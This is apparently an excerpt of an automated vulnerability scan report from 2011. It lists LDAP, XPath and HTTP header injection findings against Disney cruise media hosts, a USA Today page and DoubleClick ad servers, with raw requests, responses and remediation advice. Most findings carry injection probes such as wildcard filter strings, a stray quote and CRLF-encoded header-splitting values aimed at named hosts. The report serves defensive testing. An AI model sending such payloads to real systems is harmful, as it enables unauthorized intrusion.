               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & Stars">Characters & Stars</a></li>
               <li><a id="games" iconId="iconGames" channelId="153603" href="http://disney.go.com/games/#/games/" title="Games">Games</a></li>
               <li><a id="videos" iconId="iconVideos" channelId="153585" href="http://disney.go.com/videos/#/videos/" title="Videos">Videos</a></li>
               <li><a id="create" iconId="iconCreate" channelId="307445" href="http://disney.go.com/create/#/create/" title="Create">Create</a></li>
               <li><a id="my_page" iconId="iconMyPage" channelId="153582" href="http://disney.go.com/mypage/#/mypage/" title="My Page">My Page</a></li>
           </ul>
       </div>
   </div>
   <div id="gde_chromeDataSearch">
       <a href="http://disney.go.com/search/?q=" searchURL="http://disney.go.com/search" title="Search Disney.com">Search Disney.com</a>
   </div>
</div>
<script language="javascript" type="text/javascript">
var _gdeChrome = ne
...[SNIP]...

Request 2

GET /*)!(sn=*/concat/2.39.0.9/css?files=/nonGlobal/pleaseWait.css HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:35:36 GMT
Content-Length: 33408
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">

           </div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forgot your password?</a></dd>
                   <dd class="extraLinks"><a href="/register/" title="Don't have a log in? Register Now">Don't have a log in? Register Now</a></dd>
               </dl>
           </form>
       </div>
       <div id="forgotPassForm" class="flyoutForm">
           <form method="post" action="/forgot-password/" id="forgotPasswordFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="memberName" class="formInput" value="" /></dd>
                   <dt><label for="flyoutLastName">Last Name:</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="flyoutLastName" name="lastName" class="formInput" value="" /></dd>
                   <dt><label for="birthDay">Your Birthday:</label></dt>
               <dd class="required birthday">
                       <select name
...[SNIP]...

2.2. http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://dcl2.wdpromedia.com
Path:	/media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg

Issue detail

Request 1

GET /*)(sn=*/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg?t=1245453798364 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:50 GMT
Content-Length: 102660
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">

       <div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & Stars">Characters & Stars</a></li>
               <li><a id="games" iconId="iconGames" channelId="153603" href="http://disney.go.com/games/#/games/" title="Games">Games</a></li>
               <li><a id="videos" iconId="iconVideos" channelId="153585" href="http://disney.go.com/videos/#/videos/" title="Videos">Videos</a></li>
               <li><a id="create" iconId="iconCreate" channelId="307445" href="http://disney.go.com/create/#/create/" title="Create">Create</a></li>
               <li><a id="my_page" iconId="iconMyPage" channelId="153582" href="http://disney.go.com/mypage/#/mypage/" title="My Page">My Page</a></li>
           </ul>
       </div>
   </div>
   <div id="gde_chromeDataSearch">
       <a href="http://disney.go.com/search/?q=" searchURL="http://disney.go.com/search" title="Search Disney.com">Search Disney.com</a>
   </div>
</div>
<script language="javascript" type="text/javascript">
var _gdeChrome = ne
...[SNIP]...

Request 2

GET /*)!(sn=*/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg?t=1245453798364 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:50 GMT
Content-Length: 33416
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">

           </div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forgot your password?</a></dd>
                   <dd class="extraLinks"><a href="/register/" title="Don't have a log in? Register Now">Don't have a log in? Register Now</a></dd>
               </dl>
           </form>
       </div>
       <div id="forgotPassForm" class="flyoutForm">
           <form method="post" action="/forgot-password/" id="forgotPasswordFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="memberName" class="formInput" value="" /></dd>
                   <dt><label for="flyoutLastName">Last Name:</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="flyoutLastName" name="lastName" class="formInput" value="" /></dd>
                   <dt><label for="birthDay">Your Birthday:</label></dt>
               <dd class="required birthday">
                       <select name
...[SNIP]...

3. XPath injection previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://travel.usatoday.com
Path:	/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /cruises/post'/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1 HTTP/1.1
Host: travel.usatoday.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 16 May 2011 01:20:15 GMT
Content-Length: 3080

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

4. HTTP header injection previous next
There are 9 instances of this issue:

http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel [REST URL parameter 1]
http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney [REST URL parameter 1]
http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [REST URL parameter 1]
http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18 [REST URL parameter 1]
http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45 [REST URL parameter 1]
http://ad.doubleclick.net/adi/x1.dt/dt [REST URL parameter 1]
http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932 [REST URL parameter 1]
http://ad.doubleclick.net/adj/pmv.telegraph.tg/sponsored [REST URL parameter 1]
http://c7.zedo.com/utils/ecSet.js [v parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

4.1. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adj/tmg.telegraph.sponsored/sponsored.travel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 678b5%0d%0a8384566a10f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /678b5%0d%0a8384566a10f/tmg.telegraph.sponsored/sponsored.travel;at=header;pos=1;sc=sponsored-travel;pt=story;pg=8509794;lvl=3;biw=1136;bih=902;fv=10;sz=1x1;tile=1;ord=1305509216094? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/8509794/Win-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/678b5
8384566a10f/tmg.telegraph.sponsored/sponsored.travel;at=header;pos=1;sc=sponsored-travel;pt=story;pg=8509794;lvl=3;biw=1136;bih=902;fv=10;sz=1x1;tile=1;ord=1305509216094:
Date: Mon, 16 May 2011 01:35:08 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adj/tmg.telegraph.sponsored/sponsored.travel.disney

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6df0f%0d%0a9d7229a8f0d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6df0f%0d%0a9d7229a8f0d/tmg.telegraph.sponsored/sponsored.travel.disney;at=header;pos=1;sc=sponsored-travel-disney;pt=story;pg=8509938;lvl=4;biw=1136;bih=902;fv=10;sz=1x1;tile=1;ord=1305508777021? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6df0f
9d7229a8f0d/tmg.telegraph.sponsored/sponsored.travel.disney;at=header;pos=1;sc=sponsored-travel-disney;pt=story;pg=8509938;lvl=4;biw=1136;bih=902;fv=10;sz=1x1;tile=1;ord=1305508777021:
Date: Mon, 16 May 2011 01:21:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 237ec%0d%0a880ab23038f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /237ec%0d%0a880ab23038f/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/237ec
880ab23038f/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http: //ads.bluelithium.com/clk
Date: Mon, 16 May 2011 01:34:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.4. http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8fa4b%0d%0a608cfb9867d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8fa4b%0d%0a608cfb9867d/N4975.1207.TRAVELOCITY.COM/B5393428.18;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d122243%26AdID%3d164325%26TargetID%3d8852%26Segments%3d1,9,3090,4300,4303,5796,5907,9520,10495,11148,12670,13331,18268,20052,20168,20299,20311,21094,21281%26Targets%3d8427,8852,28340,30167,30402,30431,31703,31958,8948%26Values%3d25,30,51,60,72,80,92,101,110,152,194,215,234,261,293,2176,2218,2285,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2468,2537,4760,4772,6472,6474,6974,8257,8512,8829,9120,9844,9845,9846,12194,12196%26Redirect%3d;ord=nkufyk,bgKaRRRrgqcz? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=cruise&paxa=0&paxs=0&paxc=0&adloc=NA&random=813059&tile=534041638164681
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8fa4b
608cfb9867d/N4975.1207.TRAVELOCITY.COM/B5393428.18;sz=160x600;click=http: //dm.travelocity.com/event.ng/Type=click&FlightID=122243&AdID=164325&TargetID=8852&Segments=1,9,3090,4300,4303,5796,5907,9520,10495,11148,12670,13331,18268,20052,20168,20299,20311,21094,21281&Targets=8427,8852,28340,301
Date: Mon, 16 May 2011 01:30:30 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.5. http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.DbclkAdEx/B5478635.45

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2e63e%0d%0a47716407f97 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2e63e%0d%0a47716407f97/N5823.DbclkAdEx/B5478635.45;sz=728x90;ord=7992084605561387239;AD_ID=26005388;BEHAVIOR_SIGNAL_ID=319697420;CHANNEL_ID=11185948;LINE_ITEM_ID=184588126;PUBLISHER_ID=11185880;SITE_ID=13906109?;click=http://r.turn.com/r/tpclick/id/57ha2ZqW6W5ZugEAbQABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9942530385485090&output=html&h=90&slotname=7409232867&w=728&lmt=1305527557&flash=10.3.181&url=http%3A%2F%2Fsecureshopping.mcafee.com%2F&dt=1305509556443&bpp=3&shv=r20110509&jsv=r20110506&correlator=1305509557695&frm=0&adk=2067801485&ga_vid=934359654.1305509558&ga_sid=1305509558&ga_hid=579067022&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&fu=0&ifi=1&dtd=1275&xpc=N75PYouOId&p=http%3A//secureshopping.mcafee.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2e63e
47716407f97/N5823.DbclkAdEx/B5478635.45;sz=728x90;ord=7992084605561387239;AD_ID=26005388;BEHAVIOR_SIGNAL_ID=319697420;CHANNEL_ID=11185948;LINE_ITEM_ID=184588126;PUBLISHER_ID=11185880;SITE_ID=13906109:
Date: Mon, 16 May 2011 01:42:11 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.6. http://ad.doubleclick.net/adi/x1.dt/dt [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.dt/dt

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 84877%0d%0ac4dfd0f2329 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /84877%0d%0ac4dfd0f2329/x1.dt/dt;sz=1x1;ord=1289783? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=;u=17918465;ord=6394684?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/84877
c4dfd0f2329/x1.dt/dt;sz=1x1;ord=1289783:
Date: Mon, 16 May 2011 01:25:42 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.7. http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5155.272756.AOL-ADVERTISING/B5116932

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 13a44%0d%0ad08cd4fa359 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /13a44%0d%0ad08cd4fa359/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000786652/mnum=0001007584/cstr=71920917=_4dd07bc9,3027560310,786652%5E1007584%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=71920917/optn=64?trg=;ord=3027560310? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
